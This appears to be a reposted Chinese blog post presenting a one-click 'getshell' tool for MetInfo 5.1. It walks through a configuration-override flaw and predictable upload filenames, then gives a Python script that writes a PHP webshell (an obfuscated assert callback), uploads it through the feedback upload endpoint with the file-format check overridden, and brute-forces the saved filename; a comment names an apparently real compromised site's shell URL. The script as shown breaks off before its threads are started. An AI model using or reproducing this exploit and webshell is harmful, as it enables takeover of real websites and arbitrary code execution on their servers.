zoukankan      html  css  js  c++  java
  • MetInfo 5.1 自动化getshell工具

    
    
    title: MetInfo V5.1 GetShell一键化工具
    date: 2016-06-08 22:40:32
    categories: Hacker
    tags:
     - Hacker
     - Tools
    ---
    ----------
    # 漏洞解析:
    ----------
    **config/config.inc.php**
    ```php
    $langoks = $db->get_one("SELECT * FROM $met_lang WHERE lang='$lang'");
    
    if(!$langoks)die('No data in the database,please reinstall.');
    
    if(!$langoks[useok]&&!$metinfoadminok)okinfo('../404.html');
    
    if(count($met_langok)==1)$lang=$met_index_type;
    
    $query = "SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'";//看这里
    
    $result = $db->query($query);
    
    while($list_config= $db->fetch_array($result)){
    
        if($metinfoadminok)$list_config['value']=str_replace('"', '"', str_replace("'", ''',$list_config['value']));
    
        $settings_arr[]=$list_config;
    
        if($list_config['columnid']){
    
            $settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value'];
    
        }else{
    
            $settings[$list_config['name']]=$list_config['value'];
    
        }
    
    }
    
    @extract($settings);
    ```
    ----------
    <!--more-->
    访问
    
    http:///localhost/metinfo5.1/index.php?lang=metinfo
    
    `SELECT * FROM met_config WHERE lang='metinfo' or lang='metinfo'`
    
    ----------
    ## 文件命名方式:
    ----------
    **/feedback/uploadfile_save.php**
    ```php
    srand((double)microtime() * 1000000);
    
    $rnd = rand(100, 999);
    
    $name = date('U') + $rnd;
    
    $name = $name.".".$ext;
    
    ```
    **文件保存在/upload/file/目录**
    
    命名方式就是时间戳去掉后三位,紧接着一个三位数的随机数
    
    可爆破:
    
    如
    
    http://127.0.0.1/upload/file/1465394396.php
    
    ----------
    
    # 一键化利用工具:
    
    ----------
    
    **本程序基于python编写**
    
    ```python
    #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    
    import requests
    import Queue
    import threading
    import time
    import sys
    
    
    headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36'}
    
    urls = Queue.Queue()
    #http://hb.jhxjd.com/upload/file/1441445378.php
    
    def bp(urls,time_out):
        while not urls.empty():
            base_url = urls.get()
            response = None
    
            try:
                time.sleep(int(time_out))#延时设置
                response = requests.get(base_url,headers=headers)
                if response.status_code == 404:
                    print 'Not Fount----%s ' % base_url
            except:
                continue
            finally:
                if response:
                    with open('url.txt','a+') as f:
                        f.write('%s?e=YXNzZXJ0 '%base_url)
    
    def main(target_url,thread_num,time_out):
    
        #取出当前时间戳并删除后四位
        now = str(int(time.time()))[:-4]
    
        #将所有的待爆破地址遍历并加入队列
        for i in range(0,10):
            for j in range(100,1000):
                num_str = ''.join((str(i),str(j)))
                url = ''.join(('%s/upload/file/%s' % (target_url,now),num_str,'.php'))
                urls.put(url)
    
        #上传文件
        with open('xiaoma.php','w+') as fi:
            fi.write("<?php $e = $_REQUEST['e'];register_shutdown_function(base64_decode($e), $_REQUEST['Akkuman']);?>")
        data = {
                'fd_para[1][para]':'filea',
                'fd_para[1][type]':'5'
                }
        files = {'filea': open("xiaoma.php", 'rb')}
        upload_url = '%s/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo' % target_url
        res = requests.post(upload_url,data = data,files=files)
        #等待两秒  文件上传
        time.sleep(2)

         ---转载

    hacktech.cn|53xiaoshuo.com
  • 相关阅读:
    波段是金牢记六大诀窍
    zk kafka mariadb scala flink integration
    Oracle 体系结构详解
    图解 Database Buffer Cache 内部原理(二)
    SQL Server 字符集介绍及修改方法演示
    SQL Server 2012 备份与还原详解
    SQL Server 2012 查询数据库中所有表的名称和行数
    SQL Server 2012 查询数据库中表格主键信息
    SQL Server 2012 查询数据库中所有表的索引信息
    图解 Database Buffer Cache 内部原理(一)
  • 原文地址:https://www.cnblogs.com/zgyc/p/6237753.html
Copyright © 2011-2022 走看看